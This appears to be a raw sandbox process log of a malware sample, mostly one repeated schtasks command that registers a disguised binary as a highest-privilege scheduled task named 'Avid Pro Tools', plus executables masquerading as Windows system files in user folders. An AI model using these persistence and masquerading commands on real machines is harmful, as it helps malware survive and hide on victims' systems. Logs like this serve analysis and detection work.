"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\eHome\wininit.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\winNet\lsm.exe

C:\winNet\lsm.exe

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\Bloxstrap.exe

C:\winNet\Bloxstrap.exe

C:\Windows\Offline Web Pages\Refcrt.exe

"C:\Windows\Offline Web Pages\Refcrt.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\lsm.exe.exe

"C:\winNet\lsm.exe.exe"

C:\Windows\Offline Web Pages\Refcrt.exe.exe

"C:\Windows\Offline Web Pages\Refcrt.exe.exe"

C:\Users\All Users\Microsoft\eHome\wininit.exe.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\Bloxstrap.exe.exe

"C:\winNet\Bloxstrap.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\Idle.exe

C:\winNet\Idle.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

